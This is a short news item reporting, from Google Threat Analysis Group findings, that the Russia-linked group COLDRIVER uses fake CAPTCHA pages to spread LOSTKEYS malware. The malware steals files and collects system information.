Russian Hackers Use Fake CAPTCHA to Spread Malware

A Russia-linked hacking group known as COLDRIVER has been identified deploying a new malware strain dubbed LOSTKEYS as part of a cyber-espionage campaign, according to findings shared by Google’s Threat Analysis Group. The attackers are leveraging deceptive CAPTCHA-like pages, mimicking the ClickFix verification interface, to trick targets into downloading the malicious payload.

Once installed, LOSTKEYS scans the infected device for files stored in specific directories and with certain file extensions, exfiltrating the data to remote servers controlled by the attackers. The malware also gathers system information and reports active processes, offering the threat actor deeper insights into compromised environments.

The use of social engineering tactics such as fake CAPTCHA challenges marks a continued evolution in COLDRIVER’s operational playbook. The campaign underscores the persistent threat posed by state-linked cyber actors, particularly those focused on intelligence gathering. The operation reflects a broader trend of targeting users through increasingly sophisticated and contextually convincing lures.